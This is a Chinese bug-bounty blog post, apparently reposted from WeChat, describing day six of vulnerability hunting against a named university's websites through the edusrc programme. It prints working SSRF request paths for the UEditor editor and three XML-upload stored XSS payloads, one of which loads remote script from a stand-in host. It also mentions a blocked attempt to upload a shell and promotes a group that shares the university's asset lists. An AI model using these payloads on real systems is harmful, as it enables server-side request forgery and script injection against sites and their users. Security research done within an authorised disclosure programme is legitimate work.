edusrc漏洞挖掘第六天|我一眼就看出你这请求不对劲

admin 2023年2月7日23:39:15评论73 views字数 1431阅读4分46秒阅读模式

edusrc漏洞挖掘第六天|我一眼就看出你这请求不对劲

作者:辛巴大佬



前面几天的内容:


edusrc漏洞挖掘第一天


deusrc漏洞挖掘第二天


deusrc漏洞挖掘第二天


deusrc漏洞挖掘第四天


deusrc漏洞挖掘第五天



首先简单给大家说个好消息,公众号停运一年后,终于在这几天粉丝破万了,哈哈哈。


edusrc漏洞挖掘第六天|我一眼就看出你这请求不对劲


另外,通知一下我的第一万个粉丝,后台私信我活着加我微信:hkxinba 领取第一个万个粉丝的幸运奖励,希望看到赶紧来领,另外,这几天,我们会展开公众号粉丝抽奖的活动,其他的粉丝都有机会领取奖品!


这位幸运儿就是:


edusrc漏洞挖掘第六天|我一眼就看出你这请求不对劲




今天是edusrc漏洞挖掘第六天,还是老规矩,继续对edusrc排名第一的上海交通大学进行漏洞挖掘。


edusrc漏洞挖掘第六天|我一眼就看出你这请求不对劲


昨天我在看一个交大网站后台的时候,发现加载了一个请求。


edusrc漏洞挖掘第六天|我一眼就看出你这请求不对劲


看到路径加载了百度编辑器的信息,访问了编辑器路径,正常打开:


edusrc漏洞挖掘第六天|我一眼就看出你这请求不对劲


本来想通过脏字符直接上传shell,但是被拦截了。


所以,剩下的两个漏洞就只有,ssrf和一个储存xss漏洞。


第一个ssrf漏洞:


/ueditor/jsp/getRemoteImage.jsp?upfile=http://127.0.0.1/favicon.ico?.jpg
/ueditor/jsp/controller.jsp?action=catchimage&source[]=https://www.baidu.com/img/baidu_jgylogo3.gif
/ueditor/php/controller.php?action=catchimage&source[]=https://www.baidu.com/img/baidu_jgylogo3.gif


直接访问,存在就会抓取成功


成功如图,怕有人遍历所有网站路径,所以我把后面的码掉了。


edusrc漏洞挖掘第六天|我一眼就看出你这请求不对劲


edusrc漏洞挖掘第六天|我一眼就看出你这请求不对劲


第二个xml文件上传的xss:


直接在图片位置上传,本地新建一个xml文件,把poc放进去,在这里,我使用了弹窗poc验证,一下三个poc分别是:弹窗/跳转

/远程加载js

<html><head></head><body><something:script xmlns:something="http://www.w3.org/1999/xhtml"> alert(1);</something:script></body></html>
<html><head></head><body><something:script xmlns:something="http://www.w3.org/1999/xhtml"> window.location.href="https://baidu.com/";</something:script></body></html>
<html><head></head><body><something:script src="http://xss.com/xss.js" xmlns:something="http://www.w3.org/1999/xhtml"></something:script></body></html>


xss成功访问如图:


edusrc漏洞挖掘第六天|我一眼就看出你这请求不对劲

还有我提交的很多交大漏洞没有修复完成,修复完成后,我会发出来,写这篇文章的前一个小时,我挖到了一个交大的高危,今天算是没白忙活,今天先这样,明天继续水。




写在最后,漏洞挖掘交流群满两百人了,想加入的加我微信拉:


微信号:hkxinba


里面提供交大资产,和漏洞挖掘交流,有兴趣的一定要加入!



原文始发于微信公众号(绿帽子安全团队):edusrc漏洞挖掘第六天|我一眼就看出你这请求不对劲

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2023年2月7日23:39:15
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   edusrc漏洞挖掘第六天|我一眼就看出你这请求不对劲http://cn-sec.com/archives/1542020.html

发表评论

匿名网友 填写信息